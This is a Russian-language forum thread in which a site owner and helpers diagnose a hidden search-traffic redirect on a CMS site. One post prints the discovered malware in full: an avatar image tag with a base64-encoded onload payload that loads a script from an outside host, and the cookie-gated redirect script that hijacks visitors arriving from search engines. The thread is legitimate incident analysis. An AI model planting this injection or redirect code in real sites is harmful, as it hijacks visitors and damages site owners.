Редирект родительской страницы

ЕСТЬ РЕШЕНИЕ ЗАКРЫТО

При переходе из поиска подменяется страница с результатами

#1 5 декабря 2017 в 14:43
Всем доброго времени! Обратил внимание, что сайт исчез из Яндекса. При этом ни в вебмастере, ни где-бы то еще никаких замечаний нет.
После общения с ТП Яндекса мне сообщили, что у меня имеет место быть "редирект родительской страницы" — при переходе из поиска на главную страницу сайта страница с результатами поиска заменяется на какое г-но с ruinfoblog
Что сделано:
1. Сайт проверен антивирусом хостера, а также через Ai-Bolt — ничего.
2. Проверены последние изменения файлов на сайте: в июле обновлялась Афиша до 1.0.5. и за два дня до выпадения результатов было установлено поле Поле "Телефон с СМС-подтверждением". Дело явно не в них. Больше никакие системные файлы не затронуты, новых не создано, технических работ на сайте кроме добавления контента не проводилось. Хотя, возможно, поменяна дата файлов.
3. Отключена реклама Гугла, удалены все сторонние баннеры. Сейчас только РСЯ на сайте и тот отключал — ничего не поменялось.

Что это такое, как с этим бороться? :)

Сайт — buturlinovka36.ru, можете вбить в гугл по запросу "бутурлиновка онлайн", перейти (2-й будет) и созерцать в окне с результатами поиска какое-то гумно.
#2 5 декабря 2017 в 14:53
Дмитрий Ядов, файл .htaccess смотрели? там есть что-то подозрительное? Обычно все вирусные редиректы делают через его модификацию.
И файл index.php сравните с тем, что идет в установочном дистрибутиве.
#3 5 декабря 2017 в 15:30
Странно, у меня нет никакого редиректа.
Нормально перехожу на сайт как с выдачи Гугла так и Яндекса...
хотя в консоль сыпятся ошибки от какого-то gridrotator ("Таблица картинок" ?)
#4 5 декабря 2017 в 17:42

у меня нет никакого редиректа

Sonat
я получил. Скорее всего, редирект идет для мобильных пользователей (я перед открытием включал режим разработчика, и там мобильный вид).
И редирект идет с помощью js, поэтому, видимо, сайт забанен в Яндексе, но еще не забанен в гугле.

Мое скромное имхо:
1. Первым делом сменить шаблон на default и отключить все нестандартные виджеты
2. Вам надо скачать сайт (кроме папки upload) и сравнить файл с установочником инстанта. Все измененные файлы надо просмотреть скурпулезно на предмет посторонних включений.
3. Сменить пароли фтп, к базе, админский пароль от сайта

Если на дефолте все будет ок, значит правки были в вашем шаблоне.
Ai-bolit мог не заметить Js редирект…
#5 5 декабря 2017 в 18:18

я получил. Скорее всего, редирект идет для мобильных пользователей (я перед открытием включал режим разработчика, и там мобильный вид).

Zau4man
пробовал и так и эдак — у меня все норм. scratch
Может там еще и гео определение идет — типо, нафиг тратится на трафик с Украины...

ЗЫ, а на какой сайт то хоть редиректит?
#6 5 декабря 2017 в 18:39
Sonat, на
ruinfoblog. com /internet-gazeta/economics/article/24134/
кстати. посмотрел историю браузера. Редирект еще и историю подчищает… Либо пишет новый адрес вместо старого, манипулируя history...



тут я открыл яндекс, вбил название домена, увидел, что его нет в результатах поиска, внизу тыкнул показать в гугле. Открылись результаты поиска в гугле, переключил на мбильный вид, там тыкнул по ссылке на сайт. Открылась бутурлиновка, стал ковырять исходный код и оп, во вкладке network пошла прогрузка левого сайта.
#7 5 декабря 2017 в 20:34


Дмитрий Ядов, файл .htaccess смотрели? там есть что-то подозрительное? Обычно все вирусные редиректы делают через его модификацию.
И файл index.php сравните с тем, что идет в установочном дистрибутиве.

Zau4man
Да, .htaccess первым делом проверял. Index.php тоже.


Странно, у меня нет никакого редиректа.
Нормально перехожу на сайт как с выдачи Гугла так и Яндекса...
хотя в консоль сыпятся ошибки от какого-то gridrotator ("Таблица картинок" ?)

Sonat
Возможно на мобильность, возможно с привязкой по региону, возможно с привязкой к кукам (с какого-то другого сайта может был переход давно на тот же домен). Допустим с ТОРа не получается получить редирект, с хрома тоже — только с Яндексбраузера.
По поводу gridrotator — отключал этот скрипт как подозрительный, так как не нашел от чего он. Явно не в нем дело.

Мое скромное имхо:
1. Первым делом сменить шаблон на default и отключить все нестандартные виджеты
2. Вам надо скачать сайт (кроме папки upload) и сравнить файл с установочником инстанта. Все измененные файлы надо просмотреть скурпулезно на предмет посторонних включений.
3. Сменить пароли фтп, к базе, админский пароль от сайта

Zau4man
1. Шаблон дефлотный с некоторыми изменениями, касаемо дизайна, сделанными как вручную, так и через Инстайлер.
2. Есть какое-нибудь средство автоматизации для этого, чтобы не вручную?
3. Сделано.
#8 5 декабря 2017 в 22:07
Дмитрий Ядов, обязательно отпишитесь, если выясните, что это было. Ну, и способ лечения… Думаю, раз есть прецедент, то вполне возможно, повторится еще.
#9 5 декабря 2017 в 22:13

. Есть какое-нибудь средство автоматизации для этого, чтобы не вручную?

Дмитрий Ядов
WinMerge
#10 5 декабря 2017 в 23:24
Нашел! dance

Этот гад подгружается скриптом с coml.be (перед закрывающим body)
проверяет referrer и если с поисковика то перекидывает на свой руинфоблог
но не всех, а только тех кто давно не заходил на сайт —
ставит свои куки и потом их проверяет что бы часто не палиться
#11 6 декабря 2017 в 00:23


Нашел! dance

Этот гад подгружается скриптом с coml.be (перед закрывающим body)
проверяет referrer и если с поисковика то перекидывает на свой руинфоблог
но не всех, а только тех кто давно не заходил на сайт —
ставит свои куки и потом их проверяет что бы часто не палиться

Sonat
А что его может подгружать-то на сайте? В коде страницы, в файле шаблона ничего подозрительного нет. В коде через Chrome строку со скриптом видно, но как установить ее источник?
З.Ы. За WinMerge спасибо, в файлах шаблона каких-либо подозрительных различий нет. вот только на сайте +200 различных файлов не из дистрибутива, включая поля, виджеты и прочие плюшки. Все взяты с каталога здесь, но если кто-то подсадил что-то в них извне — та еще возня.
Проще, наконец-то, добраться до обновления шаблона и допилить сайт под другой шаблон)))
#12 6 декабря 2017 в 00:41

Этот гад подгружается скриптом с coml.be (перед закрывающим body)
проверяет referrer и если с поисковика то перекидывает на свой руинфоблог
но не всех, а только тех кто давно не заходил на сайт —
ставит свои куки и потом их проверяет что бы часто не палиться

Sonat
Надо как-то наказать говносайт — заабузить его или найти потерпевших единомышленников и че-нить повеселее организовать )
Ждем советов от знающих людей!
#13 6 декабря 2017 в 10:19

Нашел!

Этот гад подгружается скриптом с coml.be (перед закрывающим body)
проверяет referrer и если с поисковика то перекидывает на свой руинфоблог
но не всех, а только тех кто давно не заходил на сайт —
ставит свои куки и потом их проверяет что бы часто не палиться

Sonat
можешь скинуть код, который был в шаблоне? Я найти не могу, но история 1 в 1 как у тебя. Ни трафа, родительский редирект от яндекса, coml.be — все это у меня тоже есть
#14 6 декабря 2017 в 14:27
Показал знакомому спецу "интересную проблемку" smoke


Значит так расписываю подробно:

К аватарке юзера прицеплен код
  1. <a href="/users/364" title="Елена Кучукова">
  2. <img src="/upload/003/u364/a3/03/dfb0d8e4.jpg" onload="eval(atob('dmFyIG49ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7bi5zcmM9Ii8vY29tbC5iZS9pYyI7ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoImJvZHkiKVswXS5hcHBlbmRDaGlsZChuKTs='))"
  3. width="32" height="32" alt="Елена Кучукова" title="Елена Кучукова" />
  4. </a>

Который добавляет в тело подгрузку еще одного скрипта с адреса coml.be
  1. var n=document.createElement("script");
  2. n.src="//coml.be/ic";
  3. document.getElementsByTagName("body")[0].appendChild(n);

Скрипт coml.be проверяет/ставит свои куки, смотрит с поисковика ли и делает редирект на левый сайт
  1. var rref5877=document.referrer, rt5877=GetCookie5877('r5877'), ExpDate=new Date();if(parent.window.opener && (rref5877.indexOf('google')+1 || rref5877.indexOf('nova.rambler')+1)){if(rt5877==null){parent.window.opener.location.replace("http://ruinfoblog.com/out/?eUwaYQNoJENT");}} else if(rref5877.indexOf('google')+1 || rref5877.indexOf('yandex')+1 || rref5877.indexOf('go.mail')+1 || rref5877.indexOf('nova.rambler')+1){if(rt5877==null){document.onclick = function(){window.open('http://ruinfoblog.com/out/?eUwaYQNoJENT');document.onclick = null;};}} rref5877=unescape(rref5877);ExpDate.setTime(ExpDate.getTime()+(24*60*60*1000*30));SetCookie5877('r5877', '1', ExpDate, "/");function GetCookie5877Val(offset){var endstr=document.cookie.indexOf(";", offset);if(endstr==-1)endstr=document.cookie.length;return unescape(document.cookie.substring(offset, endstr));}function GetCookie5877(name){var arg=name+"=";var alen=arg.length;var clen=document.cookie.length;var i=0;while(i<clen){var j=i+alen;if(document.cookie.substring(i, j)==arg) return GetCookie5877Val(j);i=document.cookie.indexOf(" ", i)+1;if(i == 0) break;}return null;}function SetCookie5877(name, value){var argv=SetCookie5877.arguments;var argc=SetCookie5877.arguments.length;var expires=(argc>2)?argv[2]:null;var path=(argc>3)?argv[3]:null;var domain=(argc>4)?argv[4]:null;var secure=(argc>5)?argv[5]:false;document.cookie=name+"="+escape(value)+((expires==null)?"":("; expires="+expires.toGMTString()))+((path==null)?"":("; path="+path))+((domain==null)?"":("; domain="+domain))+((secure==true)?"; secure":"");}

Удалите юзера "Елена Кучукова" и редиректа не будет
а уже потом можно будет спокойно подумать как злоумышленник смог вставить код…
#15 6 декабря 2017 в 15:55
интересно девки пляшут)
а твой знакомый спец не хочет подумать как это получилось?)
Используя этот сайт, вы соглашаетесь с тем, что мы используем файлы cookie.